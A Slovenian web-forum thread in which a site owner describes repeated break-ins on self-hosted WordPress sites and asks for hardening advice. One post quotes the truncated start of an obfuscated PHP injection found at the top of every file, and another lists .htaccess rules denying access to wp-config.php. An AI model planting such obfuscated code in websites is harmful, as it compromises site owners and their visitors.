ivank

Statistika

Pridružen/a:
10 okt 2014, 18:32
Zadnjič aktiven:
Prispevki:
Teme:
1 | Vse teme
1
0
0
#26

Vsaka .php datoteka ima na začetku vstavljeno morje znakov:



<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) {$ua=strtolower($_SERVER["\x48\124\x54\1 ............



Kaj pomaga, če to zbrišem? Ali z brisanjem sesujem stran?


všeč(0) ni všeč(0) spam(0)
#25

Ali lahko kak boljši poznavalec za vse nas, ki to nismo, napiše kaj točno je potrebno storiti in prilepi kodo?



Tody, hvala za link. Takšne konkretne nasvete bi pričakoval tudi od domačih ponudnikov gostovanj in bi vsi imeli precej manj dela in težav. Je to, kar predlaga ta hosting OK? http://www.a2hosting.com/kb/security/application-security/wordpress-security



Preko iThemes Security je bil med drugim narejen deny:


             <files .htaccess>
Order allow,deny
Deny from all
</files>
<files readme.html>
Order allow,deny
Deny from all
</files>
<files readme.txt>
Order allow,deny
Deny from all
</files>
<files install.php>
Order allow,deny
Deny from all
</files>
<files wp-config.php>
Order allow,deny
Deny from all
</files>

Ali je ta security vtičnik samo za hec? Torej moram še enkrat narediti deny v .htacces in config.php?

iThemes je našponan do konca, razen SSL in še nečesa, Limit Login Attempts je vključen.



Nič ne pomaga, zadnje mesece samo še restoramo :-(


všeč(0) ni všeč(0) spam(0)
#12

Iste vtičnike sem uporabil na obeh straneh. Na supportu vtičnikov nisem zasledil nobenega problema glede ranljivosti.



Vse varnostne nastavitve sem naredil preko iThemes vtičnika. Očitno to ne zadostuje.

Mi lahko prosim podrobno napišeš, kaj in kako treba spremeniti v htaccess?



Gesel ne shranjujem v ftp, vedno uporabljam "vprašaj za geslo" opcijo.

Ftp log: Fri Oct 10 12:49:31 2014 0 89.212.192.66 17249 /home/wwwzavod/public_html/wp-config.php a _ o r wwwzavod ftp 1 * c



Mi pa ti logi ne pomagajo, ker jih ne znam brati :-(


všeč(0) ni všeč(0) spam(0)
#9

Ups, ni res.

Nisem pa našel not nič nenavadnega.


všeč(0) ni všeč(0) spam(0)
všeč(0) ni všeč(0) spam(0)
#6

Error log?

Fatal error: Namespace declaration statement has to be the very first statement in the script in /home/wwwzavod/public_html/wp-content/plugins/background-manager/vendor/pf4wp/lib/vendor/Symfony/Component/ClassLoader/UniversalClassLoader.php on line 12



To je pisalo tudi na strani (white screen). Ko sem preko ftp preimenoval background manager vtičnik, sem se lahko logiral. Bil je dodan nov user, nov mail pri mojem admin userju, nato so bili deaktivirani vsi vtičniki.



Config.php ima na začčetku kup znakov, nima pa več gesel.



Verjetno si pa mislil kateri drug log?


všeč(0) ni všeč(0) spam(0)
#4

Ne, uporabljam Genesis Framework in Dynamik Website Builder. Vse strani so narejene "na roke", brez tem.


všeč(0) ni všeč(0) spam(0)
#2

Ne vem, nisem stručko. Kako še lahko pridejo not?

Na eni okuženi strani je tole - PHP: Backdoor-FE [Trj]


všeč(0) ni všeč(0) spam(0)
#

Pozdravljeni.



Imam veliko težav z vdori na Wordpress strani, ki gostujejo tukaj v Sloveniji. Po najboljših močeh skrbim za varnost, a očitno nekaj ne štima:




  • na računalniku imam Avast in Superantispyware in ju redno uporabljam,

  • takoj po vsaki inštalaciji WP najprej naredim novega admin uporabnika (nikoli ne uporabljam "admin") in pobrišem ID # 1,

  • vedno takoj zamenjam salt keys v config.php,

  • za gesla uporabljam cPanel generator nastavljen na 18 znakov, za vsa druga gesla pa generator nastavljen na 30 znakov!

  • na Filezilla nimam shranjenih gesel, res pa je, da uporabljam navadni ftp in ne sftp

  • prvi vtičniki, ki jih inštaliram, so Limit Login Attempts in iThemes Security (pred časom tudi nekajkrat Wordfence ali All in one Security), "navit" skoraj do konca,

  • Wordpress, teme in vsi vtičniki so redno posodabljani.



A, kot rečeno, vse to nič ne pomaga. Pred slabim mesecem sem eno stran, ki je imela težave z vdori, naredil popolnoma na novo - zbrisal sem račun, naredil novega, nova inštalacija WP, vse narejeno od začetka na novo, niti delčka kode nisem uporabil iz stare strani, uporabil sem vse varnostne postopke - in zdaj je stran ponovno okužena.



Vesel bom še kakšnega konkretnega predloga za izboljšanje varnosti. Mislim, da nisem edini s podobnimi težavami.



Lp


všeč(1) ni všeč(0) spam(0)